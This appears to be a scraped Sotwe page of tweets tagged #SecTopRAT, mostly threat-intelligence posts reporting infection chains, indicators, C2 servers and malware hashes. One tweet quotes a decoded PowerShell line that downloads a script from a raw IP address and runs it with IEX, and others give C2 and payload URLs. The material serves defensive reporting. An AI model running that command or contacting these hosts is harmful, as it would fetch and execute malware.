Sotwe logo Sotwe logo

Top Tweets for #SecTopRAT

threatintel's profile image
Threat Intelligence @threatintel
#ThreatProtection #Lumma Stealer & #SectopRAT paired in a resurfacing attack chain starting with "cracked" software, read more: https://t.co/ZJZBEyqHWm #malware
0
2
2
0
1K
sans_isc's profile image
SANS.edu Internet Storm Center Verified account @sans_isc
ISC Diary: #LummaStealer infection with #SectopRAT (#ArechClient2) https://t.co/DuBKN4gJoW
sans_isc's tweet photo. ISC Diary: #LummaStealer infection with #SectopRAT (#ArechClient2) https://t.co/DuBKN4gJoW https://t.co/qSHvePKdYT
0
3
3
0
1K
sans_isc's profile image
SANS.edu Internet Storm Center Verified account @sans_isc
ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://t.co/g4XR3RCgxi
sans_isc's tweet photo. ISC Diary: #SmartApeSG campaign pushes #Remcos #RAT, #NetSupportRAT, #StealC and #SectopRAT (#ArechC https://t.co/g4XR3RCgxi https://t.co/1QfFCwWsqI
1
13
6
7
2K
JAMESWT_WT's profile image
JAMESWT @JAMESWT_WT
https://t.co/3S9rtyf0bW 👇 C2 179.61.145.]140 related to #SectopRAT Samples https://t.co/LlMcTmXhZ5
JAMESWT_WT's tweet photo. https://t.co/3S9rtyf0bW 👇 C2 179.61.145.]140 related to #SectopRAT Samples https://t.co/LlMcTmXhZ5 https://t.co/9Txf467rJW
0
2
1
1
111
StopMalvertisin's profile image
Kimberly @StopMalvertisin
#SectopRAT via #malvertising - #RenPy #RenpyLoader For the (un)trained eye it's becoming increasingly difficult to distinguish #malicious #ads and real downloads. https://t.co/vSB76aqogJ https://t.co/ZcXcIQobXV
StopMalvertisin's tweet photo. #SectopRAT via #malvertising - #RenPy #RenpyLoader For the (un)trained eye it's becoming increasingly difficult to distinguish #malicious #ads and real downloads. https://t.co/vSB76aqogJ https://t.co/ZcXcIQobXV https://t.co/ikyAs0CjCb
2
12
4
4
1K
pamircil's profile image
pamir:~# Verified account @pamircil
📌 Zararlı PDF'ler, Türkiye'yi doğrudan hedef alıyor. IoC’ler: • c28f8fa5f0cb8c6a942b6b7f1884dcf5 • c6c3194a1f081ab7dc840cbf588e2ef4 • 176[.]65[.]132[.]6 • evgshippingline[.]com #StealC - #Vidar - #ArechClient2 - #SectopRAT kaynak: @kaspersky IoC claim: @malpulse
1
24
2
9
3K
skocherhan's profile image
ܛܔܔܔܛܔܛܔܛ Verified account @skocherhan
36[.]255[.]98[.]59:9000/wbinjget AS208137 Feo Prest SRL 🇹🇼 #Arechclient2 #SecTopRAT #RedlineStealer
skocherhan's tweet photo. 36[.]255[.]98[.]59:9000/wbinjget AS208137 Feo Prest SRL 🇹🇼 #Arechclient2 #SecTopRAT #RedlineStealer https://t.co/uHWjmuxj5P
smica83's profile image
Szabolcs Schmidt Verified account @smica83
'nocturia.ps1' @abuse_ch https://t.co/e68bDPPwXq Source URL: hxxp://62.60.135(.)8/nocturia
smica83's tweet photo. 'nocturia.ps1' @abuse_ch https://t.co/e68bDPPwXq Source URL: hxxp://62.60.135(.)8/nocturia https://t.co/JAZvrppJjt
0
0
0
1
717
0
3
1
1
368
skocherhan's profile image
ܛܔܔܔܛܔܛܔܛ Verified account @skocherhan
107[.]189[.]21[.]86:9000/wbinjget AS14956 ROUTERHOSTING 🇳🇱 #Arechclient2 #SecTopRAT
skocherhan's tweet photo. 107[.]189[.]21[.]86:9000/wbinjget AS14956 ROUTERHOSTING 🇳🇱 #Arechclient2 #SecTopRAT https://t.co/pq55gL2bvo
smica83's profile image
Szabolcs Schmidt Verified account @smica83
'DockerDesktop zip' @abuse_ch https://t.co/dxYH3osiss URL: hxxp://107.189.17(.)143:9000/wbinjget
smica83's tweet photo. 'DockerDesktop zip' @abuse_ch https://t.co/dxYH3osiss URL: hxxp://107.189.17(.)143:9000/wbinjget https://t.co/1lZaW0Tx0c
0
1
1
0
833
0
5
0
4
473
r3nzsec's profile image
Renzon Verified account @r3nzsec
Okay #FlowViz @feedly , this is cool! Tried linking the report we published from @TheDFIRReport on #SectopRat, and FlowViz smoothly created these visuals in less than 3 minutes. https://t.co/FwosF0sgqn
0
9
1
11
2K
skocherhan's profile image
ܛܔܔܔܛܔܛܔܛ Verified account @skocherhan
3acc2336b8d45f0dae5c2cbaf8d24222 1cd150e0c173bd746fbca10440d5d1eb 48862b66199348aa375af9f88b74cdb7 705b25a484408fea27f2d8d3557407ca 83[.]222[.]191[.]98:9000/wbinjget rinasalleh[.]com 107[.]158[.]128[.]45 polarcompany[.]org 173[.]44[.]141[.]89 teamsi[.]org #SectopRAT #CastleRAT #TAG150
smica83's profile image
Szabolcs Schmidt Verified account @smica83
'ScannerElectr64 zip' is a #HijackLoader from India @abuse_ch ZIP is detected but all files FUD in it. https://t.co/VlFYP6gTh7 C2: hxxp://88.214.50(.)35:9000/wbinjget
smica83's tweet photo. 'ScannerElectr64 zip' is a #HijackLoader from India @abuse_ch ZIP is detected but all files FUD in it. https://t.co/VlFYP6gTh7 C2: hxxp://88.214.50(.)35:9000/wbinjget https://t.co/z7AAZWSjL7
1
6
1
1
842
0
1
0
1
274
threatquery's profile image
ThreatQuery @threatquery
🚨 New C2 Detected! 🔗 216[.]75[.]145[.]227 ℹ️ ASN: AS17014 ℹ️ ASN Organization: NAN 📍 Country: US 📍 City: Pittsfield 📅 2025-08-30T16:00:54 ℹ️ Type: #cnc - #c2 ℹ️ Family: #SectopRAT #ThreatIntelligence #IoCs #Malware
0
2
1
1
452
threatintel's profile image
Threat Intelligence @threatintel
#ThreatProtection Fake cracked games deliver #LummaStealer, which pulls in #SectopRAT for remote access, read more about Symantec's protection: https://t.co/0WGHdR5N7K
0
1
0
1
1K
Unit42_Intel's profile image
Unit 42 @Unit42_Intel
2025-08-15 (Friday): #LummaStealer infection leads to #SectopRAT (#ArechClient2). Details at https://t.co/V3kqDD6I37
Unit42_Intel's tweet photo. 2025-08-15 (Friday): #LummaStealer infection leads to #SectopRAT (#ArechClient2). Details at https://t.co/V3kqDD6I37 https://t.co/FAnBUDYdtC
3
125
37
36
10K
abuse_ch's profile image
abuse.ch Verified account @abuse_ch
We've observed an interesting infection chain ⛓️ in the wild, starting with #LummaStealer spread through a fake gaming website and resulting in #Latrodectus and #SectopRat 🪲🔍👀 Infection starts with the user visiting a website offering free game downloads, where they are redirected and prompted to download a password-protected zip file from mega[.]nz ⚠️ When the user executes the file, Lumma is executed in a new process, which later downloads Latrodectus and SectopRAT: Latrodectus payload URL: 🌐 https://t.co/f26oGGGHSU SectopRAT payload URL: 🌐 https://t.co/jIKVBRfOFL Latrodectus config 🗜️: CampaignID: Callisto Direction: 3 Version: 2.2 IOCs: 📡 https://t.co/wjSG3ShXM3 📡 https://t.co/7OgTaPjzO0 Malware samples: 📄 https://t.co/YsBVuCSPGt 📄 https://t.co/jYPnh1KXbl 📄 https://t.co/KeCnyiM7eB
abuse_ch's tweet photo. We've observed an interesting infection chain ⛓️ in the wild, starting with #LummaStealer spread through a fake gaming website and resulting in #Latrodectus and #SectopRat 🪲🔍👀 Infection starts with the user visiting a website offering free game downloads, where they are redirected and prompted to download a password-protected zip file from mega[.]nz ⚠️ When the user executes the file, Lumma is executed in a new process, which later downloads Latrodectus and SectopRAT: Latrodectus payload URL: 🌐 https://t.co/f26oGGGHSU SectopRAT payload URL: 🌐 https://t.co/jIKVBRfOFL Latrodectus config 🗜️: CampaignID: Callisto Direction: 3 Version: 2.2 IOCs: 📡 https://t.co/wjSG3ShXM3 📡 https://t.co/7OgTaPjzO0 Malware samples: 📄 https://t.co/YsBVuCSPGt 📄 https://t.co/jYPnh1KXbl 📄 https://t.co/KeCnyiM7eB
1
44
15
12
6K
bluish_red_'s profile image
Seth @bluish_red_
HOST-BANNER_0_HASH: `82cddf3a9bff315d8fc708e5f5f85f20` Looks like a solid predictive indicator for #ARECHCLIENT2/#SECTOPRAT redirector infra. CC: @500mk500, @SreekarMad, @ValidinLLC #GHOSTPULSE
bluish_red_'s tweet photo. HOST-BANNER_0_HASH: `82cddf3a9bff315d8fc708e5f5f85f20` Looks like a solid predictive indicator for #ARECHCLIENT2/#SECTOPRAT redirector infra. CC: @500mk500, @SreekarMad, @ValidinLLC #GHOSTPULSE https://t.co/0WdcdmKklk
elasticseclabs's profile image
Elastic Security Labs Verified account @elasticseclabs
New research from #ElasticSecurityLabs uncovers a new ClickFix campaign! Learn how attackers are using GHOSTPULSE and ARECHCLIENT2 (SECTOPRAT) in multi-stage attacks to deploy RATs and steal data. Stay informed: https://t.co/ndKdRIj76P
1
103
30
32
15K
3
14
5
0
2K
salmanvsf's profile image
Salman @salmanvsf
#SHADOWLADDER dropping #SectopRAT fc590c0f43d771f0368383e1c93e318e TRS00004589Transaction55000_pdf.zip github.]com/Bryceapichler/ github.]com/coleeantoo c2 hxxp:]//45.]137.]99.]210/v10/buhm.php @JAMESWT_WT @500mk500 @anyrun_app https://t.co/JCUblm0Sf2
salmanvsf's tweet photo. #SHADOWLADDER dropping #SectopRAT fc590c0f43d771f0368383e1c93e318e TRS00004589Transaction55000_pdf.zip github.]com/Bryceapichler/ github.]com/coleeantoo c2 hxxp:]//45.]137.]99.]210/v10/buhm.php @JAMESWT_WT @500mk500 @anyrun_app https://t.co/JCUblm0Sf2 https://t.co/I8Y4K0HcE2
3
17
5
4
2K
PRODAFT's profile image
PRODAFT Verified account @PRODAFT
Threat actors are moving away from #DanaBot, citing poor performance despite its heavy promotion on cybercrime forums. Several have already migrated to more capable tools—#SectopRAT is notably gaining traction. Full intel in our latest CATALYST brief (subscribers only): 🔗 https://t.co/dqBNSxEbhs #ThreatIntel #Malware
PRODAFT's tweet photo. Threat actors are moving away from #DanaBot, citing poor performance despite its heavy promotion on cybercrime forums. Several have already migrated to more capable tools—#SectopRAT is notably gaining traction. Full intel in our latest CATALYST brief (subscribers only): 🔗 https://t.co/dqBNSxEbhs #ThreatIntel #Malware
0
25
4
7
9K
ZeroNLabs's profile image
Zero Labs @ZeroNLabs
This one checks a lot of #LateralMovement TTPs. Could have been nicely blocked by #LDAPFirewall & #RPCFirewall + some #NetworkSegmentation How #blackSuit #ransomware spread from first fake #zoom installer -> d3f@ckloader #IDAT #SectopRAT https://t.co/nuYNOBicMp
ZeroNLabs's tweet photo. This one checks a lot of #LateralMovement TTPs. Could have been nicely blocked by #LDAPFirewall & #RPCFirewall + some #NetworkSegmentation How #blackSuit #ransomware spread from first fake #zoom installer -> d3f@ckloader #IDAT #SectopRAT https://t.co/nuYNOBicMp https://t.co/YFxPymzMJe
TheDFIRReport's profile image
The DFIR Report Verified account @TheDFIRReport
🌟New report out today!🌟 Fake Zoom Ends in BlackSuit Ransomware Analysis and reporting completed by @pigerlin, UC1 and @Miixxedup Audio: Available on Spotify, Apple, YouTube and more! https://t.co/r9hQxzPTL0
1
155
47
42
14K
0
7
2
2
668
threatintel's profile image
Threat Intelligence @threatintel
#ThreatProtection #SectopRAT #malware variant distributed under the disguise of Chrome installer, read more about Symantec's protection: https://t.co/KImo9GN3A4
0
2
1
0
1K
JAMESWT_WT's profile image
JAMESWT @JAMESWT_WT
Related Samples #SectopRAT #arechclient2 92.255.85[.]36 👇 https://t.co/NMC8Co4eQj cc @smica83 @500mk500 @spektrumdj
JAMESWT_WT's tweet photo. Related Samples #SectopRAT #arechclient2 92.255.85[.]36 👇 https://t.co/NMC8Co4eQj cc @smica83 @500mk500 @spektrumdj https://t.co/LQKqhniBNm
sp3ktrummusic's profile image
Hernan Diaz @sp3ktrummusic
The Base64 string: $New-Object Net.WebClient).DownloadString(‘http://216.238.90.145/w/koa’) | IEX
1
4
4
0
3K
0
21
7
0
2K

Last Seen Hashtags on Sotwe

teenagegirls()** +filter:native_video
Seen from Korea
alanyatravesti
Seen from Turkey
animalportrait
Seen from United States
yapamamdeme
Seen from United States
splatoonnsfw
Seen from United Kingdom
gaybarcelona
Seen from Turkey
ometv
Seen from United States
teacherstouchourhearts
Seen from United States
암캐
Seen from Japan
asianboy
Seen from Indonesia

Trends for you

1
#ForbiddenDoor
Under 10K tweets
2
#BETAwards
Under 10K tweets
3
#HOTD
Under 10K tweets
4
Megan
Under 10K tweets
5
Melanie
Under 10K tweets
6
Andrade
Under 10K tweets
7
Deadpool
Under 10K tweets
8
Emma D’Arcy
Under 10K tweets
9
Maya
Under 10K tweets
10
#nsfwtwtًً
Under 10K tweets

Most Popular Users

elonmusk's profile image
1
Elon Musk Verified account
@elonmusk
240.6M followers
barackobama's profile image
2
Barack Obama Verified account
@barackobama
119.2M followers
realdonaldtrump's profile image
3
Donald J. Trump Verified account
@realdonaldtrump
111.7M followers
cristiano's profile image
4
Cristiano Ronaldo Verified account
@cristiano
110.5M followers
narendramodi's profile image
5
Narendra Modi Verified account
@narendramodi
107M followers
rihanna's profile image
6
Rihanna Verified account
@rihanna
97.6M followers
nasa's profile image
7
NASA Verified account
@nasa
92.2M followers
justinbieber's profile image
8
Justin Bieber Verified account
@justinbieber
90.9M followers
katyperry's profile image
9
KATY PERRY Verified account
@katyperry
87.6M followers
taylorswift13's profile image
10
Taylor Swift Verified account
@taylorswift13
81.4M followers
ladygaga's profile image
11
Lady Gaga Verified account
@ladygaga
73M followers
imvkohli's profile image
12
Virat Kohli Verified account
@imvkohli
69.8M followers
kimkardashian's profile image
13
Kim Kardashian Verified account
@kimkardashian
69.8M followers
youtube's profile image
14
YouTube Verified account
@youtube
68.7M followers
billgates's profile image
15
Bill Gates Verified account
@billgates
63.9M followers
neymarjr's profile image
16
Neymar Jr Verified account
@neymarjr
62.5M followers
theellenshow's profile image
17
The Ellen Show
@theellenshow
62.4M followers
cnn's profile image
18
CNN Verified account
@cnn
61.9M followers
x's profile image
19
X Verified account
@x
60.8M followers
selenagomez's profile image
20
Selena Gomez Verified account
@selenagomez
60.7M followers